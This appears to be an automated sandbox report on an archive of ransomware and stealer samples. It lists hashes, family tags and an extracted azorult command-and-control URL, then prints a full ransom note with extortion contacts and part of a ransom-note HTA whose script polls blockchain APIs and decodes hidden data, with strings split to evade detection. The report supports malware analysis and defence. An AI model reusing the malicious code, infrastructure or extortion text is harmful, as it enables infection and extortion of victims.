Overview

overview

10

Static

static

1

RNSM00361.7z

windows7-x64

Analysis

  • max time kernel
    169s
  • max time network
    216s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2024 16:46

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    RNSM00361.7z

  • Size

    22.0MB

  • MD5

    178c5959b76748b2dc7b8375d12db80e

  • SHA1

    f292fe20d20524d7d9ac5658f35c4b85bea72112

  • SHA256

    f526608a5b27e9f3b290011efc5ed2098a48cbb522d15f7788dcda4158a23f49

  • SHA512

    9dc3274909bb0d6a39da8008d9c72ded281581f8ceab4e667670cf8e29fe5fca173ea7a2f53d1a34effeceac0105029202f83d83a1ecb1a548009aa81c4f18c0

  • SSDEEP

    393216:uM1EMy1RIPjtv22c20MTko/jMbyQ4kFnsMXzoBzapYxt3Ld:uQPyPI5vvc2ZuQkqMM9a+h

Score
10/10
azorultdharmagandcrabglobeimposterhawkeyematrixtroldeshbackdoorcredential_accessdefense_evasiondiscoveryevasionexecutionimpactinfostealerkeyloggerpersistenceprivilege_escalationransomwarespywarestealertrojanupx

Malware Config

Extracted

Family

azorult

C2

http://admin.svapofit.com/azs/index.php

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\#Decrypt_Files_ReadMe#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red0\green0\blue255;\red255\green0\blue0;\red255\green255\blue255;} {\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\ri-500\sa200\sl240\slmult1\qc\tx8804\lang1033\b\f0\fs28 WHAT HAPPENED WITH YOUR FILES?\lang1049\f1\par \pard\ri-74\sa200\sl240\slmult1\tx8378\lang1033\b0\f0\fs24 Your documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers.\par \pard\ri-74\sl240\slmult1\tx8378 More information about the RSA and AES can be found here:\par {\field{\*\fldinst{HYPERLINK "http://en.wikipedia.org/wiki/RSA_(cryptosystem"}}{\fldrslt{\ul\cf1 http://en.wikipedia.org/wiki/RSA_(cryptosystem}}}\f0\fs24 )\par \pard\ri-74\sa200\sl240\slmult1\tx8378{\field{\*\fldinst{HYPERLINK "http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"}}{\fldrslt{\ul\cf1 http://en.wikipedia.org/wiki/Advanced_Encryption_Standard}}}\f0\fs24\par It m\lang1049\f1\'e5\'e0\lang1033\f0 ns th\lang1049\f1\'e0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 u will n\lang1049\f1\'ee\lang1033\f0 t b\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 bl\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 cc\lang1049\f1\'e5\lang1033\f0 ss th\lang1049\f1\'e5\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 n\lang1049\f1\'f3\lang1033\f0 m\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 until th\lang1049\f1\'e5\'f3\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pt\lang1049\f1\'e5\lang1033\f0 d with y\lang1049\f1\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n k\lang1049\f1\'e5\lang1033\f0 y! With\lang1049\f1\'ee\lang1033\f0 ut \lang1049\f1\'f3\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l k\lang1049\f1\'e5\lang1033\f0 y \lang1049\f1\'e0\lang1033\f0 nd s\lang1049\f1\'f0\'e5\lang1033\f0 ci\lang1049\f1\'e0\lang1033\f0 l s\lang1049\f1\'ee\lang1033\f0 ftw\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e0\lang1033\f0 t\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'ee\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 is imp\lang1049\f1\'ee\lang1033\f0 ssibl\lang1049\f1\'e5\lang1033\f0 ! If y\lang1049\f1\'ee\lang1033\f0 u will f\lang1049\f1\'ee\lang1033\f0 ll\lang1049\f1\'ee\lang1033\f0 w \lang1049\f1\'ee\lang1033\f0 ur instru\lang1049\f1\'f1\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 ns, w\lang1049\f1\'e5\lang1033\f0 gu\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e0\lang1033\f0 nt\lang1049\f1\'e5\'e5\lang1033\f0 th\lang1049\f1\'e0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n d\lang1049\f1\'e5\'f1\lang1033\f0 ry\lang1049\f1\'f0\lang1033\f0 t \lang1049\f1\'e0\lang1033\f0 ll y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s qui\lang1049\f1\'f1\lang1033\f0 kly \lang1049\f1\'e0\lang1033\f0 nd s\lang1049\f1\'e0\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 ly!\par \pard\ri-74\sl240\slmult1\tx8378 =====================================================================\par \pard\ri-74\sa200\sl240\slmult1\tx8378\lang1049\f1\'d3\'ee\lang1033\f0 u r\lang1049\f1\'e5\'e0\lang1033\f0 l\lang1049\f1\'f3\lang1033\f0 w\lang1049\f1\'e0\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s? Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 writ\lang1049\f1\'e5\lang1033\f0 us t\lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 -m\lang1049\f1\'e0\lang1033\f0 ils:\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par \pard\sa200\sl240\slmult1 [email protected]\par \b0\fs24 In subj\lang1049\f1\'e5\lang1033\f0 ct lin\lang1049\f1\'e5 \'ee\lang1033\f0 f your m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 writ\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l ID:\par \b\fs28 334F3FDC2140DC83\par \cf2 W\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\'f1\'ee\lang1033\f0 mm\lang1049\f1\'e5\lang1033\f0 nd y\lang1049\f1\'ee\lang1033\f0 u t\lang1049\f1\'ee\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nd y\lang1049\f1\'ee\lang1033\f0 ur m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'ce\lang1033\f0 N \lang1049\f1\'c5\'c0\'d1\lang1033\f0 H \lang1049\f1\'ee\lang1033\f0 f \lang1049\f1\'ce\lang1033\f0 UR 3 \lang1049\f1\'c5\'cc\'c0\lang1033\f0 ILS, du\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 f\lang1049\f1\'e0\'f1\lang1033\f0 t th\lang1049\f1\'e0\lang1033\f0 t th\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\'f3\lang1033\f0 n\lang1049\f1\'ee\lang1033\f0 t r\lang1049\f1\'e5\'e0\lang1033\f0 ch th\lang1049\f1\'e5\lang1033\f0 ir int\lang1049\f1\'e5\lang1033\f0 nd\lang1049\f1\'e5\lang1033\f0 d r\lang1049\f1\'e5\lang1033\f0 cipi\lang1049\f1\'e5\lang1033\f0 nt f\lang1049\f1\'ee\lang1033\f0 r \lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e0\lang1033\f0 ri\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'f3\lang1033\f0 \lang1049\f1\'ee\lang1033\f0 f r\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'ee\lang1033\f0 ns!\cf0\par \pard\ri-74\sl240\slmult1\tx8378\b0\fs24 =====================================================================\par \pard\ri-74\sa200\sl240\slmult1\tx8378 If \lang1049\f1\'f3\'ee\lang1033\f0 u pr\lang1049\f1\'e5\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 r liv\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 ging y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n s\lang1049\f1\'e5\lang1033\f0 nd us Bitm\lang1049\f1\'e5\lang1033\f0 nss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 s fr\lang1049\f1\'ee\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 b br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r thr\lang1049\f1\'ee\lang1033\f0 ugh th\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 bp\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 {\field{\*\fldinst{HYPERLINK "https://bitmsg.me"}}{\fldrslt{\ul\cf1 https://bitmsg.me}}}\f0\fs24 . B\lang1049\f1\'e5\lang1033\f0 l\lang1049\f1\'ee\lang1033\f0 w is \lang1049\f1\'e0\lang1033\f0 tut\lang1049\f1\'ee\lang1033\f0 ri\lang1049\f1\'e0\lang1033\f0 l \lang1049\f1\'ee\lang1033\f0 n h\lang1049\f1\'ee\lang1033\f0 w t\lang1049\f1\'ee\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nd bitm\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 vi\lang1049\f1\'e0\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 b br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r:\par 1. \lang1049\f1\'ce\lang1033\f0 p\lang1049\f1\'e5\lang1033\f0 n in y\lang1049\f1\'ee\lang1033\f0 ur br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r th\lang1049\f1\'e5\lang1033\f0 link {\field{\*\fldinst{HYPERLINK "https://bitmsg.me/users/sign_up"}}{\fldrslt{\ul\cf1 https://bitmsg.me/users/sign_up}}}\f0\fs24 \lang1049\f1\'e0\lang1033\f0 nd m\lang1049\f1\'e0\lang1033\f0 k\lang1049\f1\'e5\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 gistr\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n b\lang1049\f1\'f3\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 ring n\lang1049\f1\'e0\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd p\lang1049\f1\'e0\lang1033\f0 ssw\lang1049\f1\'ee\lang1033\f0 rd.\par 2. \lang1049\f1\'d3\'ee\lang1033\f0 u must c\lang1049\f1\'ee\lang1033\f0 nfirm th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 gistr\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n, r\lang1049\f1\'e5\lang1033\f0 turn t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'f3\'ee\lang1033\f0 ur \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd f\lang1049\f1\'ee\lang1033\f0 ll\lang1049\f1\'ee\lang1033\f0 w th\lang1049\f1\'e5\lang1033\f0 instructi\lang1049\f1\'ee\lang1033\f0 ns th\lang1049\f1\'e0\lang1033\f0 t w\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'f3\'ee\lang1033\f0 u.\par 3. R\lang1049\f1\'e5\lang1033\f0 turn t\lang1049\f1\'ee\lang1033\f0 sit\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 nd \lang1049\f1\'f1\lang1033\f0 lick \lang1049\f1 "\lang1033\f0 L\lang1049\f1\'ee\lang1033\f0 gin\lang1049\f1 "\lang1033\f0 l\lang1049\f1\'e0\lang1033\f0 b\lang1049\f1\'e5\lang1033\f0 l \lang1049\f1\'ee\lang1033\f0 r us\lang1049\f1\'e5\lang1033\f0 link {\field{\*\fldinst{HYPERLINK "https://bitmsg.me/users/sign_in"}}{\fldrslt{\ul\cf1 https://bitmsg.me/users/sign_in}}}\f0\fs24 , \lang1049\f1\'e5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'f3\'ee\lang1033\f0 ur \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd p\lang1049\f1\'e0\lang1033\f0 ssw\lang1049\f1\'ee\lang1033\f0 rd \lang1049\f1\'e0\lang1033\f0 nd click th\lang1049\f1\'e5\lang1033\f0 "Sign in" butt\lang1049\f1\'ee\lang1033\f0 n. \lang1049\f1 \lang1033\f0\par 4. \lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "\lang1049\f1\'d1\lang1033\f0 r\lang1049\f1\'e5\'e0\lang1033\f0 t\lang1049\f1\'e5\lang1033\f0 R\lang1049\f1\'e0\lang1033\f0 nd\lang1049\f1\'ee\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 ddr\lang1049\f1\'e5\lang1033\f0 ss" butt\lang1049\f1\'ee\lang1033\f0 n.\par 5. \lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "N\lang1049\f1\'e5\lang1033\f0 w m\lang1049\f1\'e0\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 " butt\lang1049\f1\'ee\lang1033\f0 n.\par \b S\lang1049\f1\'e5\lang1033\f0 nding m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 :\par T\lang1049\f1\'ee\lang1033\f0 :\b0 \lang1049\f1\'c5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'e0\lang1033\f0 ddr\lang1049\f1\'e5\lang1033\f0 ss: \b BM-2cVeq4HtLaXPGTamXgv5rvwDjypapmy8ir\par \pard\sa200\sl240\slmult1 Subj\lang1049\f1\'e5\'f1\lang1033\f0 t:\b0 \lang1049\f1\'c5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'f3\'ee\lang1033\f0 ur ID: \b 334F3FDC2140DC83\par M\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 : \b0 D\lang1049\f1\'e5\lang1033\f0 scrib\lang1049\f1\'e5\lang1033\f0 wh\lang1049\f1\'e0\lang1033\f0 t \lang1049\f1\'f3\'ee\lang1033\f0 u think n\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "S\lang1049\f1\'e5\lang1033\f0 nd m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 " butt\lang1049\f1\'ee\lang1033\f0 n.\par \pard\ri-74\sl240\slmult1\tx8378 =====================================================================\par \pard\sa200\sl240\slmult1\cf2\b\fs28 Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 , writ\lang1049\f1\'e5\lang1033\f0 us in \lang1049\f1\'c5\lang1033\f0 nglish \lang1049\f1\'ee\lang1033\f0 r us\lang1049\f1\'e5\lang1033\f0 pr\lang1049\f1\'ee\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 ssi\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l tr\lang1049\f1\'e0\lang1033\f0 nsl\lang1049\f1\'e0\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 r!\par \pard\ri-74\sa200\sl240\slmult1\tx8378 If y\lang1049\f1\'ee\lang1033\f0 u w\lang1049\f1\'e0\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s, y\lang1049\f1\'ee\lang1033\f0 u h\lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 p\lang1049\f1\'e0\lang1033\f0 y f\lang1049\f1\'ee\lang1033\f0 r d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n in Bit\lang1049\f1\'f1\'ee\lang1033\f0 ins or with \lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r top \lang1049\f1\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pt\lang1049\f1\'ee\'f1\lang1033\f0 urr\lang1049\f1\'e5\lang1033\f0 nc\lang1049\f1\'f3\lang1033\f0 .\par Th\lang1049\f1\'e5\lang1033\f0 pric\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e5\'f0\'e5\lang1033\f0 nds \lang1049\f1\'ee\lang1033\f0 n h\lang1049\f1\'ee\lang1033\f0 w f\lang1049\f1\'e0\lang1033\f0 st \lang1049\f1\'f3\'ee\lang1033\f0 u writ\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 us!\par \pard\sa200\sl240\slmult1\cf0\b0\fs24 Your message will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders.\par T\lang1049\f1\'ee\lang1033\f0 c\lang1049\f1\'ee\lang1033\f0 nfirm th\lang1049\f1\'e0\lang1033\f0 t w\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e0\lang1033\f0 n d\lang1049\f1\'e5\'f1\lang1033\f0 ry\lang1049\f1\'f0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n s\lang1049\f1\'e5\lang1033\f0 nd us up t\lang1049\f1\'ee\lang1033\f0 3 fil\lang1049\f1\'e5\lang1033\f0 s f\lang1049\f1\'ee\lang1033\f0 r fr\lang1049\f1\'e5\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\'f0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n. Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 n\lang1049\f1\'ee\lang1033\f0 te th\lang1049\f1\'e0\lang1033\f0 t fil\lang1049\f1\'e5\lang1033\f0 s f\lang1049\f1\'ee\lang1033\f0 r fr\lang1049\f1\'e5\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\'f0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n must N\lang1049\f1\'ce\lang1033\f0 T c\lang1049\f1\'ee\lang1033\f0 nt\lang1049\f1\'e0\lang1033\f0 in \lang1049\f1\'e0\lang1033\f0 n\lang1049\f1\'f3\lang1033\f0 v\lang1049\f1\'e0\lang1033\f0 lu\lang1049\f1\'e0\lang1033\f0 bl\lang1049\f1\'e5\lang1033\f0 inf\lang1049\f1\'ee\lang1033\f0 rm\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n \lang1049\f1\'e0\lang1033\f0 nd th\lang1049\f1\'e5\lang1033\f0 ir t\lang1049\f1\'ee\lang1033\f0 t\lang1049\f1\'e0\lang1033\f0 l siz\lang1049\f1\'e5\lang1033\f0 must b\lang1049\f1\'e5\lang1033\f0 l\lang1049\f1\'e5\lang1033\f0 ss th\lang1049\f1\'e0\lang1033\f0 n 5Mb.\par Y\lang1049\f1\'ee\lang1033\f0 u h\lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 sp\lang1049\f1\'ee\lang1033\f0 nd \lang1049\f1\'e0\lang1033\f0 s s\lang1049\f1\'ee\'ee\lang1033\f0 n \lang1049\f1\'e0\lang1033\f0 s p\lang1049\f1\'ee\lang1033\f0 ssibl\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 nsur\lang1049\f1\'e5\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1 \'ee\lang1033\f0 f y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s, b\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e0\lang1033\f0 us\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'ee\lang1033\f0 nt k\lang1049\f1\'e5\'e5\lang1033\f0 p y\lang1049\f1\'ee\lang1033\f0 ur d\lang1049\f1\'e5\lang1033\f0 cr\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n k\lang1049\f1\'e5\lang1033\f0 ys \lang1049\f1\'e0\lang1033\f0 t \lang1049\f1\'ee\lang1033\f0 ur s\lang1049
URLs

https://bitmsg.me}}}\f0\fs24

https://bitmsg.me/users/sign_up}}}\f0\fs24

https://bitmsg.me/users/sign_in}}}\f0\fs24

Extracted

Path

C:\Users\Admin\Documents\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return 